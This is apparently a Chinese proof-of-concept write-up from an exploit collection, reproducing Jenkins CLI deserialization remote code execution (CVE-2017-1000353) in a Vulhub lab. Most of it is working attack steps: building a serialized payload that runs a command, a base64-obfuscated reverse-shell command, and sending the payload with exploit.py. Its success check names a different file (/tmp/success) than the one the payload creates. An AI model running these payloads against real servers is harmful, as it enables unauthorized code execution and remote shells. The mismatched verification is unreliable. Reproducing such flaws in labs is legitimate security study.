Awesome-POC/中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md

Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353

漏洞描述

攻击者可以将序列化的 Java SignedObject 对象，传输到基于远程处理的 Jenkins CLI，这将最终造成反序列化，进而绕过现有基于黑名单的保护机制。

参考阅读 https://blogs.securiteam.com/index.php/archives/3171

环境搭建

Vulhub 执行如下命令启动 jenkins 2.46.1：

docker-compose up -d

等待完全启动成功后，访问 http://your-ip:8080 即可看到 jenkins 已成功运行，无需手工安装。

漏洞复现

漏洞利用过程分为两个步骤：生成恶意序列化载荷，并将其发送至目标 Jenkins 服务器。

首先，下载 CVE-2017-1000353-1.1-SNAPSHOT-all.jar 工具来生成 payload。这个工具将创建一个包含我们命令的序列化对象：

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/awesome_poc"
# jenkins_poc.ser 是生成的输出文件名
# "touch ..." 是要执行的命令

# REVERSE SHELL
# java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar revshell.ser "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"

注意：生成 payload 时的 Java 版本很重要，建议使用 OpenJDK 8u292 版本。其他版本的 Java 可能导致生成的 payload 无法成功利用。如果遇到问题，可以使用以下命令在 Docker 中生成 payload：

docker run --rm -v $(pwd):/tmp openjdk:8u292 bash -c "cd /tmp && java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser \"touch /tmp/awesome_poc\""

执行上述命令后，将生成一个名为 jenkins_poc.ser 的文件，其中包含序列化后的 payload。

下载 exploit.py，执行 python exploit.py http://your-ip:8080 jenkins_poc.ser，将刚才生成的字节码文件发送给目标：

进入 docker，发现 /tmp/success 成功被创建，说明命令执行漏洞利用成功：